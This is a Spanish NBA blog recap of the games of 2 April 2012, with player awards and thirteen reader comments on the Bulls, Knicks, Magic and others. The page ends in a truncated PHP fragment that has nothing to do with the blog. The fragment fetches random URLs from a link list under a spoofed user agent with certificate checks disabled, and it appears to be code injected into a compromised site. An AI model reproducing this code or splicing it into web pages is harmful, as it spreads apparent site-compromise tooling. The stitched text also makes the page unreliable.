La Crónica: los profesionales también jugaron

03 de April de 2012 por MagicJohnson32

OJ fishDe acuerdo, mucho estabais más pendientes de la final de la NCAA; además, anoche no jugaban ni los Heat, ni los Celtics, ni los Lakers, ni los Spurs. Pero, para empezar, esto sigue siendo un blog dedicado a la NBA y, en segundo lugar, la madrugada nos dejó partidos de lo más interesante. Sin ir más lejos, cayeron los dos líderes de conferencia. A los Bulls se les empiezan a ver las costuras sin Derrick Rose, algo que había de ocurrir más tarde o más temprano. El regreso de Rip Hamilton no compensa ni de lejos la ausencia del vigente MVP y, 86 partidos después, los Bulls enlazan dos derrotas seguidas. Los Rockets les remontaron a domicilio 15 puntos gracias a la labor de Scola, Dragic y Camby (99-93). Los Thunder, por su parte, perdieron también en casa ante los Grizzlies (94-88) sin Mike Conley pero con siete jugadores en 9 o más puntos, además de una espectacular labor de Tony Allen en ambos lados de la cancha y la mejor versión de OJ Mayo.

Uno de los partidos más trascendentales de la noche era el que disputaban Clippers y Mavericks en Dallas. La estrategia local de dejar solo a Randy Foye toda la noche se tradujo en 8 triples del escolta, y así los angelinos prolongaron de forma convincente (94-75) su racha victoriosa, que ya va por seis (la mejor de la franquicia en 20 años), y, de paso, metieron a los actuales campeones en un problema: se quedan únicamente dos partidos por encima de la novena posición. Eso es debido al triunfo de los Jazz en Portland, ante unos Blazers que no se dan por vencidos pese al claro mensaje de la gerencia de la franquicia. Un Millsap descomunal, junto con el acierto de Hayward y los errores locales en el tramo final, acabaron por imponerse a los excelentes partidos de Aldridge y Matthews (102-97).

Por último, los Bucks abusaron de la pobre defensa de los Wizards en Washington (112-98) y los Kings se impusieron a los Wolves (108-116) en un partido intrascendente pero que de alguna manera sirvió como homenaje para Brad Miller, que fue titular en la cancha donde ofreció sus mejores actuaciones.

millsap facePREMIOS

MVP: Paul Millsap. No solo por sus 31 puntos con 14 de 20 en tiros y 11 rebotes (4 de ellos de ataque), Además, anotó las dos últimas canastas en juego del partido, que permitieron a los Jazz pasar de verse 1 abajo a 70 segundos para el final a estar 3 puntos por encima poco después.

Rookie: hubo poco brillo entre los novatos. Destacaron los 14 puntos y 7 rebotes de Jan Vesely y la pareja de los Kings, Isaiah Thomas (17 puntos, 5 asistencias) y Jimmer Fredette (19 puntos).

Sorpresa: sabemos del talento de Terrence Williams, pero lo hemos podido disfrutar con cuentagotas. Anoche, 12 puntos, 12 rebotes, 3 asistencias y 2 robos. Los 28 puntos con 8 triples de Randy Foye también entran en la categoría de inesperados.

Decepción: los Mavs dieron una imagen terrible ante un rival directo por la cuarta plaza del Oeste. Se quedaron en 75 puntos y solo Nowitzki y Terry anotaron en dobles figuras. Marion y Carter personificaron mejor que nadie el mal partido de su equipo, con 7 puntos y 3 de 15 en tiros entre ambos.

Esfuerzo en vano: la dirección de los Blazers quiere que su equipo pierda partidos, cosa que quedó patente en el trade deadline. Anoche, LaMarcus Aldridge y Westley Matthews hicieron todo lo posible para ganar. El PF firmó 27 puntos, 7 rebotes y 2 tapones y el escolta estuvo prácticamente infalible con 10 de 12 en tiros de campo (5 de 6 en triples) para 33 puntos, además de 3 asistencias y 2 robos.

Imágenes | AP Photos / Getty Images

Comenta

13 comentarios a esta entrada

  1. Sancho88 dice:
    #1

    Yo debo ser el único ‘rarito’ del blog que se lo pasa teta viendo a equipos como Washington, MIlwaukee, GSW, Nets y demás gentuza. En serio, no tienen desperdicio sus partidos, es un basket mucho más anárquico, con menos tiempos muertos, que siempre son un coñazo, sobre todo a ciertas horas de la madrugada, y jugándosela de tú a tú contra el rival. Por ejemplo, me estuve viendo un ratillo del Rockets-Bulls y fue una especulación espantosa por parte de Thiboddeau. Un equipo físico, duro en defensa, pero sin más. Nulo talento ofensivo tal y como está RIP, Deng tampoco sobresale mucho últimamente, y los interiores necesitan balones ‘a cañonazos’ en la zona para sumar algo. Yo creo que si Rose no se recupera bien bien para PO (qué falta le habría hecho descansar en su momento por la lesión, y no forzar como ha hecho toda la temporada), pueden ser carne de primera ronda contra NYK, y no es ninguna coña… Aunque bueno, el año pasado dije lo mismo, y se comieron un hermoso 4-0 contra Celtics, jejeej. Ayer, Rockets les ganaron con algo de esfuerzo atrás (no demasiado) y jugando más alegre en transición a partir de la segunda mitad. Nada más, con eso les valió. Serán eliminados en primera ronda, pero tiene mucho mérito lo que están haciendo, sin Lowry desde hace dos meses…

    Ah, y ya sé que no jugaron anoche, pero un equipo que tiene buena pinta son los Magic. El otro día dieron la cara más que dignamente contra los Nuggets, jugando una variante táctica diferente sin su jugador franquicia, y demostrando que algo de vida habría después de la muerte (metafóricamente hablando) que supondría la salida de Dwight. Sin Howard podrían seguir luchando por entrar en playoffs, a mi juicio. Nelson está bastante bien, aunque físicamente, entre él y Glen Davis dejan mucho que desear (no así en cuanto a juego); Clark es una puta mierda de jugador, (con perdón) no sé de dónde lo habrán sacado, pero es que no vale ni para dar por culo (reitero mis perdones) (Comentario que me pondréis, seguramente: Es que el año pasado dio buenos recambios…. Ok, pero es más malo que la droga). Necesitan un recambio en la zona, porque sin Howard, solo rinde Anderson. El resto, correctos, sin más. J-Rich cada día es un poco más como el Guadiana, que en sus buenos años aparecía y desaparecía, pero ahora se pasa mucho más tiempo desaparecido que aparecido; Redick es una buena metralleta y Turkoglu sigue siendo Turkoglu, para lo bueno y para lo malo (reconozco que es una debilidad personal, y que nunca olvidaré la clase de baloncesto que dio en las series finales contra Lakers de hace 3 años, una gran gamberrada que no haya sido este tipo ALL-STAR. Copón!!) En playoffs yo les veo en semifinales sin ningún apuro, y una vez ahí, serán un rival duro a batir para cualquiera.

    Y decir que Vesely superará a Kirilenko, me ha hecho crujir a carcajadas. Viva el humor…

      Citar

  2. melo15 dice:
    #2

    De acuerdo contigo Sancho,Vasely no vale para nada, no sabe ni tirar ni tampoco ha sobresalido en defensa.

      Citar

  3. nba dice:
    #3

    Parece que a los Timberwolves les ha mirado un tuerto, tienen el lema :ponga un base base en nuestro equipo y vera como se lesiona ..
    A ver si lo de Ridnour no es muy grave, tiene pinta de que sera leve, pero parece que van a tener que tirar mas de M.Lee

      Citar

  4. melo15 dice:
    #4

    Bueno, ya se han comunicado los proximos 4 candidatos al HOF, Reggie Miller, Ralph Sampson, Don Nelson Y Jamaal Wilkes. Otros de los candidatos eran Tim Hardaway y Vlade Divac

      Citar

  5. Esteban dice:
    #5

    carmelo volviendo a ser carmelo, increible lo que este tio cambia cuando lo dejan ser el, ya deben buscarle un trade a amare, ya lo he dicho, creo que lee seria una buena opcion, o quiza un par de jugadores

    en los pacers, paul george es el hombre, sera un all.star no quedan dudas, su autosuperacion es increible

      Citar

  6. Sancho88 dice:
    #6

    Hostias Carmelo Anthony!! Partidazo, dios mío…

      Citar

  7. Sancho88 dice:
    #7

    Al final no pudo remar más él solo, pero casi remonta un partido que, realmente, han tirado los Knicks. Ganando de 15 y al final perdiendo de 8 por la nula defensa de señores como Novak o Davis, y los rebotes ofensivos que les ha cogido Amudnson, aderezados con la metralleta en el último cuarto de Granger (Jugón!!) y las buenas penetraciones de Paul George.

    Ojo a la ida de olla de Jr. Smith… No tiene desperdicio

      Citar

  8. nba dice:
    #8

    Respecto al Nets-Lakers, madre mia me da a mi que Gasol va a acabar fundido , no se porque no cuenta con Hill, para tenerlo calentando el banquillo o agitando toallas, yo creo que mas que Murphy podría aportar.
    Respecto a los Grizzlies, se puede decir que son bastante solidos

      Citar

  9. melo15 dice:
    #9

    Bueno, estoy rezando para que los Bulls queden primeros del Este, porque si no la hemos cagado. Yo creo que a los Bulls sin Rose nos los cepillamos, por cierto cuando esta previsto que vuelva?
    Pero, ha sido de aquellos partidos en los que Melo se va a los 30 puntos, pero suda del marcador?

      Citar

  10. Sancho88 dice:
    #10

    No, no, no. Ha anotado en momentos clave, siendo el mayor peligro de Knicks, lo que pasa es que al final estaba bastante cansado y no le han entrado los tiros claves, también le han hecho 2×1 al borde de la falta… Muy serio jugó anoche Carmelo, pero del resto no puedo decir lo mismo

      Citar

  11. melo15 dice:
    #11

    Sinceramente creo que los Knicks se zamparan a los Bulls sin Rose, y con este depende de qual sea su nivel. Si pasamos de ronda las cosas de facilitarian mucho, porque los Magic no son rival para los Knicks. Y en finales de conferencia perdemos contra los Heat.
    PD: Sabeis cuando volvera Rose?

      Citar

  12. Sancho88 dice:
    #12

    melo15:
    Sinceramente creo que los Knicks se zamparan a los Bulls sin Rose, ycon este depende de qual sea su nivel. Si pasamos de ronda las cosas de facilitarian mucho, porque los Magic no son rival para los Knicks. Y en finales de conferencia perdemos contra los Heat.
    PD: Sabeis cuando volvera Rose?

    Bueno, por lo visto ayer, la baja de Lin sí que parece definitiva para echar por tierra cualquier posibilidad de Knicks. Mira melo, Davis está bastante mal, y en defensa le superan todos los bases, ayer Hill le hizo lo que quiso. Shumpert es sumamente irregular, y Bibby… madre de dios, cuando sale a la cancha me dan ganas de llorar… en qué pedazo de carne se ha convertido? Esa es la principal tara de Knicks, y además en la zona no tienen a nadie que aporte ofensivamente, más allá de Stoudamire, que no sé cuando volverá. Por tanto, sin un base decente en todo el equipo, y sin gente en la zona que pueda hacer daño, el equipo basa completamente su juego en las individualidades de Carmelo y en las metralletas esporádicas de Jr. y Novak (sigue siendo un paquete auténtico, pese a algunos buenos partidos). No sé, otro jugador que siempre rinde es Landry Fields, pero no es un jugador determinante. Ahora mismo presentan un desequilibrio en el equipo. La solución, en mi opinión, pasaría por empaquetar a Stoudamire a los Hornets a cambio de Kaman y Carl Landry

      Citar

  13. melo15 dice:
    #13

    Pero Shumpert defensivamente no es irregular?Shumpert-Fields-Melo-Stat-Chadler, es equipazo y en el banco: Davis-Douglas-Novak y Novak… tampoco esta tan mal, superior al de los Bulls

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>